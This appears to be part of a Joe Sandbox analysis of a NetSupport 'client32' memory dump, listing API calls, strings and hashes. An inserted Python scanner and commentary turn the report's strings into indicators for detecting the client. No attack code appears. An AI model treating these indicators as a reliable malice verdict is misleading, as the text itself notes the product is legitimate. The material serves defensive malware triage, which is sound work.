                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFocusWindow_memsetwsprintf
                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                    • API String ID: 133491855-2167791130
                                                                                                                                                                                                    • Opcode ID: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
                                                                                                                                                                                                    • Instruction ID: f78834b4020d8e2e6f829c6f5032a1a8cba214c943ee8e0f2be50220b25a4479
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f65e150b113dac071697823f5246cea45f0e0d9d2d8fe942133c289e5f9292e4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4851B0B5A00606AFE741CFA8DC80BABB7E5FB48354F11856DF995C7340EA34A942CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004C), ref: 110948BE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004D), ref: 110948C7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004E), ref: 110948CE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000000), ref: 110948D7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004F), ref: 110948DD
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000001), ref: 110948E5
                                                                                                                                                                                                    • GetRegionData.GDI32(?,00001000,?), ref: 1103F2D5
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: MetricsSystem$DataErrorExitLastMessageProcessRegionwsprintf
• String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
• API String ID: 1231476184-2270926670
• Opcode ID: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
• Instruction ID: 7bd6763c5981859c823165d8063a1c4bf52d6bb4432795ccb6ce09120d22f5b2
• Opcode Fuzzy Hash: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
• Instruction Fuzzy Hash: C2613DB5E001AA9FCB24CF54CD84ADDF3B5BF88304F0082D9E689A7244DAB46E85CF51
APIs
  • Part of subcall function 110758B0: GlobalAddAtomA.KERNEL32(NSMCoolbar), ref: 11075905
  • Part of subcall function 110758B0: GetSysColor.USER32 ref: 11075923
  • Part of subcall function 110758B0: GetSysColor.USER32(00000014), ref: 1107592A
  • Part of subcall function 110758B0: GetSysColor.USER32(00000010), ref: 11075931
  • Part of subcall function 110758B0: GetSysColor.USER32(00000008), ref: 11075938
  • Part of subcall function 110758B0: GetSysColor.USER32(00000016), ref: 1107593F
  • Part of subcall function 110AE730: InitializeCriticalSection.KERNEL32(00000154,00000000,110BD632,24DE4E77,00000000,00000000,00000000,00000000,00000000,111819F4,000000FF,?,1105D27F,?), ref: 110AE741
  • Part of subcall function 1110D060: GetCurrentThreadId.KERNEL32 ref: 1110D0F6
  • Part of subcall function 1110D060: InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D109
  • Part of subcall function 1110D060: InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D118
  • Part of subcall function 1110D060: EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
  • Part of subcall function 1110D060: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
• OleInitialize.OLE32(00000000), ref: 110BD6C2
  • Part of subcall function 110CA340: InterlockedIncrement.KERNEL32(111E2E04), ref: 110CA348
  • Part of subcall function 110CA340: CoInitialize.OLE32(00000000), ref: 110CA36C
• GlobalAddAtomA.KERNEL32(NSMCobrowse), ref: 110BD715
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ColorInitialize$CriticalSection$AtomGlobal$CreateCurrentEnterEventIncrementInterlockedThread
• String ID: NSMCobrowse
• API String ID: 2361268844-2243205248
• Opcode ID: 480f82f715d3db037f59bf22d8cff68ac2f134bddf303eff0ed238e57d294aba
• Instruction ID: 226d89ac1b4541342643fefbc1fc1e817936d527e4f01f79d48319a6218e5bfa
• Opcode Fuzzy Hash: 480f82f715d3db037f59bf22d8cff68ac2f134bddf303eff0ed238e57d294aba
• Instruction Fuzzy Hash: 92513778904B85DFD720CFA9C59479EFBE4BF18308F5089ADD4AA93241DB747604CB62
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 11009295
• _memmove.LIBCMT ref: 110092E6
  • Part of subcall function 11008D80: std::_Xinvalid_argument.LIBCPMT ref: 11008D9A
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Xinvalid_argumentstd::_$_memmove
• String ID: string too long
• API String ID: 2168136238-2556327735
• Opcode ID: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
• Instruction ID: be305049c21c6d802d82ad86ff43ec2f0153ea4b5fc4fe3555ff5b1edb8d11a0
• Opcode Fuzzy Hash: 91e1c889b45ef3916207e9bff09e53fb613e1cc83fc8da0f74f3339f2b8fe869
• Instruction Fuzzy Hash: 0A31DB32F046109BF720DD9CE88095AF7EDEFA57A4B20462FE58AC7740EB719C4487A0
APIs
• _strtok.LIBCMT ref: 110394CC
  • Part of subcall function 1115F7E6: __getptd.LIBCMT ref: 1115F804
• _strtok.LIBCMT ref: 1103959C
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _strtok$__getptd
                                                                                                                                                                                                    • String ID: ; >
                                                                                                                                                                                                    • API String ID: 715173073-2207967850
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1101F664
                                                                                                                                                                                                      • Part of subcall function 1115BD70: SetPropA.USER32(00000000,00000000), ref: 1115BD8E
                                                                                                                                                                                                      • Part of subcall function 1115BD70: SetWindowLongA.USER32(00000000,000000FC,1115B780), ref: 1115BD9F
                                                                                                                                                                                                      • Part of subcall function 1115AC80: SetPropA.USER32(?,?,?), ref: 1115ACD5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Chat Window Destroyed, xrefs: 1101F57B
                                                                                                                                                                                                    • OnDestroy - delete m_WBFrameWnd, xrefs: 1101F62A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Prop$DeleteLongObjectWindow
                                                                                                                                                                                                    • String ID: Chat Window Destroyed$OnDestroy - delete m_WBFrameWnd
                                                                                                                                                                                                    • API String ID: 2163963939-4047192309
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00000400,?,00000000,00000000,?,00000401,?,?,?,?), ref: 111432DB
                                                                                                                                                                                                    • wvsprintfA.USER32(?,?,?), ref: 111432F2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114330A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FormatMessagewvsprintf
                                                                                                                                                                                                    • String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
                                                                                                                                                                                                    • API String ID: 65494530-3330918973
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F10B
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                                                                                                      • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 1100F122
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                    • API String ID: 963545896-2556327735
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,24DE4E77,?,?,00000000,00000000,1117DF28,000000FF,?,1107076F,00000000), ref: 110633FE
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CreateErrorEventExitLastMessageProcesswsprintf
• String ID: ..\ctl32\Connect.cpp$event
• API String ID: 3621156866-397488498
• Opcode ID: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
• Instruction ID: 1e179fcce89b41eecb28e868e3bc3d371cf40be5e8a1825c7246c0f04d2a5f7d
• Opcode Fuzzy Hash: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
• Instruction Fuzzy Hash: 02115AB5A04715AFD720CF59C841B5AFBE8EB44B14F008A6AF8259B780DBB5A6048B90
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 11019155
  • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
  • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
  • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
• _memmove.LIBCMT ref: 11019184
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
• String ID: vector<T> too long
• API String ID: 1785806476-3788999226
• Opcode ID: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
• Instruction ID: 308c0151805cc611b22231fe70dd9f684293cd40c739421a1377831650370b76
• Opcode Fuzzy Hash: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
• Instruction Fuzzy Hash: 6E0192B2E012059FD724CE69DC808A7B7E9EB95314715CA2EE59687704EA70F940CB90
Strings
• Error. preventing capbuf overflow, xrefs: 1100B5B6
• Error. NULL capbuf, xrefs: 1100B591
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID:
• String ID: Error. NULL capbuf$Error. preventing capbuf overflow
• API String ID: 0-3856134272
• Opcode ID: b100d5d4233022e8e44f9cc269860516e9a81280fef5c0ee83371a58609a8e05
• Instruction ID: b2f01cc33cf96cd7d64b71e3bc45feb1f3f5f8ef4c82cb259c390b308aa88610
• Opcode Fuzzy Hash: b100d5d4233022e8e44f9cc269860516e9a81280fef5c0ee83371a58609a8e05
• Instruction Fuzzy Hash: EC012BBAE0060997DB10CE55F800ADBB398DFC037DF04883AEA5E93501E231F5D18692
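The function entries above list the strings the sandbox found in the client32 module dump: the source path `..\ctl32\Connect.cpp`, the `Client32` MessageBox caption, and the `Error. NULL capbuf` / `Error. preventing capbuf overflow` capture-buffer messages, alongside the generic MSVC STL texts `string too long` and `vector<T> too long`. The following scanner is an added example, not part of the Joe Sandbox report, that turns those strings into a triage check for another dump or carved file. The only facts taken from the report are the strings themselves and the 0x11000000 dump base; the function names, the threshold, the assumption that the input is a raw image dump (so offset equals RVA), and the sample buffer are this example's own.

```python
"""Triage a memory dump for the NetSupport client32 strings listed in the report.

Added example, not part of the Joe Sandbox report. The indicator strings come
from the report's function entries; the sample buffer is constructed.
"""
import re

# Strings the report shows in the client32 dump. The first group is specific to
# NetSupport's client (source path, MessageBox caption, capture-buffer errors).
# The second group is generic MSVC STL text present in practically any C++
# binary built with Visual Studio, so it is tracked separately and never used on
# its own to call a hit.
SPECIFIC = [
    b"..\\ctl32\\Connect.cpp",
    b"Client32",
    b"Error. NULL capbuf",
    b"Error. preventing capbuf overflow",
]
GENERIC = [
    b"string too long",
    b"vector<T> too long",
]

# Base the report gives for the client32 dump. Assumption: the input is a raw
# image dump, so a buffer offset is already an RVA. For an on-disk PE you would
# have to map file offsets through the section table instead.
IMAGE_BASE = 0x11000000


def find_strings(data: bytes, needles) -> dict:
    """Return {needle: [offsets...]} for every occurrence of each needle.

    Each needle is searched both as ASCII and as UTF-16LE, since Windows
    binaries frequently carry the same text in both encodings. re.escape keeps
    the backslashes in the source path literal.
    """
    hits = {}
    for needle in needles:
        offsets = []
        for encoded in (needle, needle.decode("ascii").encode("utf-16-le")):
            offsets.extend(m.start() for m in re.finditer(re.escape(encoded), data))
        if offsets:
            hits[needle.decode("ascii")] = sorted(offsets)
    return hits


def classify(data: bytes, min_specific: int = 2) -> dict:
    """Summarise which specific and generic strings are present and whether the
    number of distinct specific strings reaches the threshold for calling the
    buffer a NetSupport client image."""
    specific = find_strings(data, SPECIFIC)
    generic = find_strings(data, GENERIC)
    return {
        "specific": specific,
        "generic": generic,
        "netsupport_client": len(specific) >= min_specific,
    }


def to_va(offset: int, base: int = IMAGE_BASE) -> int:
    """Map a raw image dump offset to a virtual address."""
    return base + offset


def build_sample() -> bytes:
    """Constructed buffer: zero padding followed by four of the report's strings
    at known offsets (0x40, 0x50, 0x59, 0x6E). Not a real dump."""
    buf = bytearray(0x40)
    buf += b"string too long\x00"            # generic STL text at 0x40
    buf += b"Client32\x00"                   # MessageBox caption at 0x50
    buf += b"..\\ctl32\\Connect.cpp\x00"     # source path at 0x59
    buf += b"Error. NULL capbuf\x00"         # capture-buffer error at 0x6E
    return bytes(buf)


if __name__ == "__main__":
    result = classify(build_sample())
    for name, offsets in result["specific"].items():
        print(f"{name!r}: " + ", ".join(hex(to_va(o)) for o in offsets))
    print("NetSupport client:", result["netsupport_client"])
```

The generic STL strings are deliberately kept out of the verdict: on their own they say nothing beyond "compiled with MSVC". A positive result also only shows that a NetSupport client image is present; NetSupport Manager is a legitimate remote-administration product, and whether its presence is malicious is decided by context such as how and from where the client was dropped and launched.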
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 110D12E3
  • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
  • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
  • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
• _memmove.LIBCMT ref: 110D1308
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
